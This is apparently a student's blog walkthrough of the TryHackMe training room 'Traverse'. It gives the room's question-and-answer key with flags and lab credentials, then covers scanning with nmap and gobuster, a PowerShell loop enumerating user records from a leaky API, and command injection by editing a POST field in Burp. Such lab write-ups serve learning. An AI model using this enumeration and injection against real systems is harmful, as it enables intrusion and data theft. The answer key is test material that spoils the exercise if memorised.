TL;DR walkthrough of the TryHackMe room Traverse.
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
I’m still going over SDLC material on TryHackMe and studying up for a college class. I’m mediocre at best at webapps, so I figured I’d post my notes on how I got through this room in case they come in handy again.
I will lead with the questions and answers and then show how I made my way through the room.
Q & A
What type of encoding is used by the hackers to obfuscate the JavaScript file?
hex
What is the flag value after deobfuscating the file?
Directory listing is the only way
Logging is an important aspect. What is the name of the file containing email dumps?
email_dump.txt
The logs folder contains email logs and has a message for the software team lead. What is the name of the directory that Bob has created?
planning
What is the key file for opening the directory that Bob has created for Mark?
THM{100100111}
What is the email address for ID 5 using the leaked API endpoint?
john@traverse.com
What is the ID for the user with admin privileges?
3
What is the endpoint for logging in as the admin? Mention the last endpoint instead of the URL. For example, if the answer is URL is tryhackme.com/admin — Just write /admin.
/realadmin
The attacker uploaded a web shell and renamed a file used for managing the server. Can you find the name of the web shell that the attacker has uploaded?
thm_shell.php
What is the name of the file renamed by the attacker for managing the web server?
renamed_file_manager.php
Can you use the file manager to restore the original website by removing the “FINALLY HACKED” message? What is the flag value after restoring the main website?
THM{WEBSITE_RESTORED}
My methodology
As always start with a nmap scan.
sudo nmap -sV -O 10.10.69.166
Let’s enumerate the webserver that’s running on port 80.
gobuster dir -u http://10.10.69.166 -w /usr/share/wordlists/dirb/common.txt
The logs directory turned out to be our initial way in.
I referenced the TryHackMe room I had done earlier while studying up on SDLC and made sure that I had the first phase of the Secure Software Development Lifecycle (SSDLC) right. It is indeed planning.
Hence we visit 10.10.69.166/planning, login with the credentials admin \ THM{100100111}, and find the URL of an API that accepts GET requests.
Let’s use the ID value as a variable and send a series of GET requests, increasing the number by 1 as we go.
Set-Location ".\THM stuff\SDLC Stuff"
# GET http://MACHINE IP/api/?customer_id=1
$x = 0
$z = 7
Do
{
$Result = Invoke-WebRequest -Uri "http://10.10.65.38/api/?customer_id=$x" -Method Get
If($Result.Content -ne "$null")
{
#Write-Host "User # $x exists."
$Result.Content | Out-File .\TraverseUsers.txt -Append
$Result.RawContent | Out-File .\TraverseUsers.txt -Append
}
$x = $x + 1
}
While($x -le $z)Skimming through the output in TraverseUsers.txt ID #3 jumps out as having higher privileges.
{"data":{"id":"3","name":"admin","email":"realadmin@traverse.com","password":"admin_key!!!","timestamp":"2023–05–23 04:47:25","role":"admin","loginURL":"\/realadmin","isadmin":"1"},"response_code":200,"response_desc":"Success"}
{"data":{"id":"4","name":"Mark","email":"mark@traverse.com","password":"qwerty4","timestamp":"2023–05–23 04:47:25","role":"user","loginURL":"\/client","isadmin":"0"},"response_code":200,"response_desc":"Success"}
HTTP/1.1 200 OK
Content-Length: 212
Content-Type: application/json
Date: Mon, 04 Mar 2024 18:44:29 GMT
Server: Apache/2.4.41 (Ubuntu)Swing by 10.10.69.166/realadmin and one will notice that it’s just a drop down list with two options; show the present working directory and the user the webapp is running as. However even someone as mediocre with webapps as myself knows that an attacker is not limited by the web form.
Hence we fire up BurpSuite and use Firefox’s builtin Foxy Proxy to send our POST request to 10.10.69.166/realadmin through Burp first. The body of the post contains “command=whoami” so we simply change the command and voila, we have command injection.
We now know that there is another directory under 10.10.69.166/renamed_file_manager.php and the login is admin \ THM{10101}. Nice.
It turns out that this lists all the webpages, java, php, etc that make up the website itself. We can now view and edit all content.
Hence we simply edit index.php and removed the “finally hacked” message left behind by the attacker.
THM’s questions wanted us to find an obfuscated file and figure out the message in it. This led me to look for a *.js file, and the first one I opened was hex.
Summary
This was a good little room overall and actually fun, even for someone who sucks at webapps as bad as I do. The SDLC studying continues in the new DevSecOps Pathway.
References
TryHackMe SSDLC room: https://tryhackme.com/room/securesdlc
Hex to text converter: http://www.unit-conversion.info/texttools/hexadecimal/
